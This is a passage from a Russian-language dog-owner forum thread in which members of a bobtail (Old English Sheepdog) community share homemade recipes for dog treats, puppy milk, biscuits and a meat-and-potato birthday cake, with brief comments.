- Для щенков необходимо 1/2 стакана воды на 1/4 стакана овсянки и этого хватит на 1/2 порции.

Похлебка

Похлебку можно использовать в качестве вспомогательного энергетического корма с высоким содержанием белка для щенков, беременных или кормящих сук; собак, перенесших операцию, или слабых собак:


1 /4 стакана козьего молока (можно использовать и коровье молоко);
1/8 столовой ложки кукурузного масла;
1/4-1 банан;
1/8-1 чайной ложки пшеничных ростков;
щепотка соли;
1/4-2 чайной ложки меда;
пшеничные сливки.

Положите мед и молоко в кастрюлю и нагревайте мед до тех пор, пока он не станет жидким. Добавьте пшеничные сливки понемногу, пока смесь не загустеет. Снимите кастрюлю с огня и добавьте банан, масло и соль. Добавьте пшеничных ростков - и можно давать собаке (убедитесь, что похлебка не слишком горячая). Ее можно подавать между приемами основной пищи один или два раза в день или перед сном.
Дозируйте похлебку в зависимости от размеров вашей собаки. Мелким собакам - небольшое количество похлебки, крупным собакам - большее количество. То, что останется, поместите в холодильник в закрытом сосуде.
Используйте микроволновую печь, чтобы разогреть ее, но перед этим размешайте и убедитесь, что вы ее не перегрели. Похлебка может оставаться в холодильнике не более 3 дней. Не добавляйте пшеничных ростков в эту смесь - посыпайте непосредственно перед подачей.

Чесночные галеты для собак

Эти галеты - прекрасная замена тем, которые можно купить в магазинах, так как последние содержат большое количество сахара, пигментов и консервантов:

1/2 стакана неотбеленной муки;
1/2 стакана цельной пшеничной муки;
1/2 стакана кукурузного порошка;
1/8 стакана обезжиренного сухого молока;
1/8 чайной ложки раздавленного чеснока;
1 яйцо, слегка взбитое;
1-1 1/4 стакана воды.

Смешайте три первых ингредиента в большой миске. Добавьте оставшиеся ингредиенты, добавьте такое количество воды, чтобы тесто было густым. Замешивайте тесто до тех пор, пока оно не станет однородным, потом раскатайте его до толщины 1/2 сантиметра. Используя специальную форму в виде кости, наделайте печений. Положите их на слегка смазанный жиром противень. Печь в течение 45 минут в прогретой до 350 градусов духовке, пока печенье не станет темно-золотистого цвета. Выключите печь и оставьте Печенье внутри еще на 4 часа, пока оно не станет твердым. После этого поместите в герметичную упаковку.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:25

Собачье мороженое

Ингредиенты:
2 стаканчика ванильного йогурта (пониженной жирности)
или 0,25 л питьевого,
размятый банан,
2 ч.л. меда.

Приготовление:
Все смешать, слепить небольшие конфетки, заморозить в морозилке.

Домашнее молоко для щенков

Ингредиенты:
1 ст козьего молока,
1/2 ст коровьего,
1/2 ст 10-15% сливок
1 ч.л меда,
1 яичный желток.

Приготовление:
Все ингредиенты тщательно смешать. Медленно поить щенят с помощью шприца (без иглы) или бутылочки с соской.

Собачьи галеты (Рецепт для хлебопечки.)

Ингредиенты:
1 чашка крепкого бульона, нагретого до 28С
2 ст. л оливкового масла
1 яйцо
3 1/2 чашки белой муки (или 2 чашки белой муки и 1 1/2 - с отрубями)
2 ст. л сухого молока
1/2 ч. л соли
1 ч.л дрожжей

Приготовление:
Поместите все продукты в чашу хлебопечки и установите цикл ТЕСТО. Готовое тесто раскатайте толщиной 1,3 см и вырежьте формочкой или острым ножом фигурки. Оставьте на противене в теплом месте на 20 минут до увеличения объема. Выпекайте при 200С 10 минут, затем уменьшите температуру до 150 и подсушивайте еще 10.

Можно посыпать, сыром, семенами, но можно обойтись без этого. Прекрасно получаются на двух противенях на разных уровнях.
Вернуться к началу Перейти вниз
?????
Гость
Anonymous



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Ср 26 Сен 2012, 10:30

Торт праздничный

Продукты:

Для одного коржа:
450 грамм фарша из мяса птицы (индейка, курица, утка),
2 морковки, порезанные кубиками,
280 грамм шпината, замороженного и отжатого,
1 стакан вареного коричневого риса
2 свареных вкрутую и нарезанных яйца
1 ст.л. растительного масла, 1 слегка взбитое сырое яйцо
приготовление
1. выложить мясной фарш, морковь, шпинат, рис, масло и сырое яйцо в большую миску и тщательно перемешать.
2. разложить половину смеси по дну приготовленной формы для выпечки
3. выложить поверх смеси вареное яйцо, закрыть остатками смеси. Выпекать 45-50 минут в духовке, разогретой до 180 градусов
4. вынуть корж из духовки и дать остыть 5-7 минут. Вынуть из формы, слить жидкость.
5. на корж выложить 2 стакана картофельного пбре.
6. выпечь второй корж и положить его на слой из пюре. Украсить готовый торт остатками пюре, выдавливая звездочки и полосочки из кондитерского мешочка.


Я готовила вот такой торт на Др своей лабры)
Ей очень понравился Супер -Кок!  568527

Супер -Кок!  IMG_4047

Супер -Кок!  IMG_4093
Вернуться к началу Перейти вниз
Анжиlica
Житель форума
Житель форума
Анжиlica



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Ср 26 Сен 2012, 12:47

Рецепты - Супер! Супер -Кок!  568527 Только вот с трудом верится, что собачкам попробовать дают, ингредиенты Супер -Кок!  798926
Abigal1 пишет:
1 ст козьего молока,
dezzi пишет:
1 стакан вареного коричневого риса
dezzi, Света праздничный торт - обалденный! Супер -Кок!  425152
А мы вот такие пряники пекли Супер -Кок!  8357de6044d8
рецепт давать не буду, точно не для собачек, хотя мои по кусочку все равно получили Супер -Кок!  975789
Вернуться к началу Перейти вниз
 

Супер -Кок!

Предыдущая тема Следующая тема Вернуться к началу 
Страница 1 из 1

 Похожие темы

-
» Хорошая кухня для праздника и стола

Права доступа к этому форуму:Вы не можете отвечать на сообщения
Староанглийская овчарка (БОБТЕЙЛ) - ФОРУМ :: Разговоры обо всем :: Кормление-
© "Форум Староанглийская овчарка-Бобтейл"||2009||Все права защищены||При использовании любых материалов ссылка на форум строго обязательна!
Создать форум | ©phpBB | Бесплатный форум поддержки | Сообщить о нарушении | Последние обсуждения
Груминг и стрижка бобтейла тел. 8-920-900-23-09, Ирина.